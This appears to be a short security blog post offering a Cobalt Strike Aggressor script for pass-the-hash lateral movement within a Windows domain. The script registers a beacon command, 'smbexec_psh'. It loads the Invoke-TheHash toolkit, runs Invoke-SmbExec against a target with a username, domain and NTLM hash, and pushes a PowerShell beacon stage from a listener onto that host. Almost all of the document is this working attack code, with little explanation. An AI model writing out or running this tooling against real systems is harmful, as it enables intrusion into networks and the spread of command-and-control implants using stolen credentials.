text 针对同一林中跨域PTH的make_token，psexec / lateral movement / sekurlsa :: pth问题的廉价解决方案。

Posted 2021-05-01

# Lateral Movement using Invoke-TheHash toolkit
# Written by Mumbai
# git clone https://github.com/Kevin-Robertson/Invoke-TheHash
# mv Invoke-TheHash/Invoke-TheHash.ps1 Invoke-TheHash.ps1
# cat Invoke-TheHash/Invoke-*.ps1 >> Invoke-TheHash.ps1


beacon_command_register("smbexec_psh", "Lateral movement using Invoke-TheHash toolkit",
				       "Synopsis: smbexec_psh [target] [listener] [username] [domain] [ntlm]\n\n",
				       "Run a payload on a target via Invoke-TheHash SMBExec");

alias smbexec_psh {
	if ($3 is $null) {
		openPayloadHelper({
			smbexec_psh_go($bid, $target, $1, $username, $domain, $ntlm);
		}, $bid => $1, $target => $2, $username => $4, $domain => $5, $ntlm => $6);
	}
	else {
		smbexec_psh_go($1, $2, $3, $4, $5, $6);
	}
}

sub smbexec_psh_go {
	local('$command $beaconstage');

	if (listener_info($3) is $null) {
		berror($1, "Listener $3 does not exist");
		return;
	}

	btask($1, "Tasked Beacon to jump to $2 (" . listener_describe($3, $2) . ") via SMB Exec");

	$beaconstage = powershell($3, true, "x86");
		
	bpowershell_import!($1, script_resource("Invoke-TheHash.ps1"));

	$command  = 'Invoke-SmbExec -Target ';
	$command .= $2;
	$command .= ' -Command "';
	$command .= $beaconstage;
	$command .= '" -Username ';
	$command .= $4;
	$command .= ' -Domain ';
	$command .= $5;
	$command .= ' -Hash ';
	$command .= $6;

	bpowerpick($1, $command);

	bstage($1, $2, $3, "x86");

}